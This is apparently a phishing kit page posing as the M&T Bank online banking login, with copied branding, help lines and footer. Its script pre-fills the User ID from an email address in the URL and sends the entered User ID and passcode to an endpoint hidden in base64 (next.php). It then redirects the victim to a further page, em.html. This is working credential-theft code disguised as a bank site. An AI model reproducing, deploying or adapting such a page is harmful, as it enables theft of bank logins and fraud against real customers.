<html lang="en">

<head>
    <title>Welcome to Online Banking | M&amp;T Bank</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link href="css/css.css" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
</head>

<body>
    <form>
        <div class="mtb-app-enrollment">
            <header class="mtb-page-header">
                <div class="grid-x align-center">
                    <div class="cell"><a href="#" class="mtb__logo"><img src="images/mtb-logo.svg" alt="M&amp;T Bank Site"></a></div>
                </div>
            </header>
            <div class="mtb-page-error js-pgLevelMsg" id="error" style="display: none;">
                <div class="mtb-app-default--content">
                    <div class="callout __has-icon warning __no-border">
                        <i class="fas fa-info-circle"></i>
                        <span id="errorrr" style="color: grey;">That account doesn't exist. Enter a different account</span>
                    </div>
                </div>
            </div>
            <div class="mtb-app-login--content" id="div1" style="display: block;">
                <div class="grid-x grid-x__padded __spacer-section">
                    <div class="cell">
                        <div class="mtb-section-header mtb-section-header__login">
                            <h1> Log In to Online Banking </h1>
                            <p> For Personal and Business Accounts </p>
                        </div>
                    </div>
                    <!--  <center>
                        <div class="alert alert-danger" id="msg" style="display: block;color: red;font-weight: 600;font-size: 14px">Invalid Password..! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="display: block;color: red;font-size: 14px">That account doesn't exist. Enter a different account</span>
                    </center> -->
                    <div class="cell"><label for="userId" id="emtxt"> User ID </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="ai" name="ai" autocomplete="off" aria-required="true" maxlength="20">
                        </div>
                    </div>
                    <div class="cell"><label for="Passcode"> Passcode </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" data-fc-id="122" type="password" id="pr" name="pr" autocomplete="off" aria-required="true" data-inputtype="tel" maxlength="20">
                            <div class="input-group-button">
                                <button type="button" id="Show" data-btnfor="Passcode" class="button clear hide js-showHide">Show</button></div>
                        </div>
                    </div>
                    <div class="cell">
                        <div class="mtb-formcheckbox"><input class="show-for-sr" type="checkbox" id="RememberUserId" name="RememberUserId" value="false"><label for="RememberUserId" class="__spacer-remove"> Remember User ID </label></div>
                    </div>
                </div>
                <div class="grid-x grid-padding-x __spacer-paragraph grid-x__padded">
                    <div class="cell"><button class="button button__form-no-spacer expanded" id="submit-btn"> Log In </button></div>
                    <div class="cell"><a href="#" class="button button__fake-padding-no-spacer expanded clear" id="jsAnalyticsLink">Help with User ID or Passcode</a></div>
                    <div class="cell"><a href="#" class="button button__fake-padding expanded clear" id="jsAnalyticsEnrollLink" data-attribute="item">Enroll Now</a></div>
                    <p class="cell text-center __font-size-tiny __color-gray-accent"> Unauthorized access is prohibited. Usage may be monitored. </p>
                </div>
            </div>
            <div class="mtb-app-login--content" id="div2" style="display: none;margin-bottom: 200px">
                <div class="grid-x grid-x__padded __spacer-section">
                    <div class="cell">
                        <div class="mtb-section-header mtb-section-header__login">
                            <h1> Thank You For Verifying Your Account </h1>
                        </div>
                    </div>
                </div>
            </div>
            <hr class="__spacer-section">
            <div class="mtb-app-default--content">
                <div class="grid-x grid-padding-x grid-x__padded">
                    <div class="cell text-center">
                        <p class="__font-size-secondary"> Have questions about M&amp;T Online Banking? </p>
                    </div>
                    <div class="cell medium-6 text-center">
                        <p class="__font-size-secondary __color-primary __spacer-paragraph-half"> Personal Accounts: <a href="#" class="__no-underline">1-800-790-9130</a></p>
                        <p class="__font-size-sub __spacer-remove __color-gray-accent"> Monday - Friday 8am - 9pm ET </p>
                        <p class="__font-size-sub __spacer-paragraph __color-gray-accent"> Saturday - Sunday 9am - 5pm ET </p>
                    </div>
                    <div class="cell medium-6 text-center">
                        <p class="__font-size-secondary __color-primary __spacer-paragraph-half"> Business Accounts: <a href="#" class="__no-underline">1-800-724-6070</a></p>
                        <p class="__font-size-sub __spacer-remove __color-gray-accent"> Monday - Friday 6am - 9pm ET </p>
                        <p class="__font-size-sub __spacer-section __color-gray-accent"> Saturday - Sunday 9am - 5pm ET </p>
                    </div>
                </div>
            </div>
            <section class="mtb-footer mtb-footer__auth" role="contentinfo">
                <div class="grid-x">
                    <div class="cell flex-container flex-dir-column align-center-middle">
                        <div class="mtb-footer--auth"><a href="#" class="" target="_blank">Get Started Guide</a><a href="#" target="_blank">Security Assistance</a><a href="#" target="_blank">Digital Service Agreement</a><a href="#" target="_blank">ESign Agreement</a><a href="#" target="_blank"> Accessibility </a><a href="#" target="_blank"> mtb.com </a></div>
                        <div class="mtb-footer--non-auth">
                            <p> ©2021 M&amp;T Bank. All Rights Reserved.<br> Users of this website agree to be bound by the provisions of the M&amp;T website <a href="#" target="_blank"> Terms of Use </a> and <a href="#" target="_blank">Privacy Policy</a>. </p>
                            <div class="mtb-footer__logo"><a href="#" target="_blank"><img src="images/mtb-equalhousinglender.svg" class="mtb-footer__equalhousinglender" alt="Equal Housing Lender"></a><a href="#" target="_blank"><img src="images/mtb-entrust.svg " class="mtb-footer__entrust" alt="Entrust"></a></div>
                            <p> Equal Housing Lender NMLS #381076 <a href="#" target="_blank">Member FDIC</a></p>
                        </div>
                    </div>
                </div>
            </section>
        </div>
    </form>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#error").hide();
    }
    ///////////////url getting ai////////////////

    var file = "bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#error').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();

        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#errorrr').html("User ID field is empty.!");
            return false;
        }

        if (!pr) {
            $('#error').show();
            $('#errorrr').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifying...');
            },
            
            complete: function() {
                if (count >= 1) {
                    count = 0;

                    window.location.replace("./em.html");

                    return false;

                }
                $("#errorrr").html("You have entered an invalid User ID and/or Passcode. Please try again.");
                $("#error").show();
                $("#pr").val("");
                $('#submit-btn').html('Log In');
            }
        });
    });


});
</script>

</html>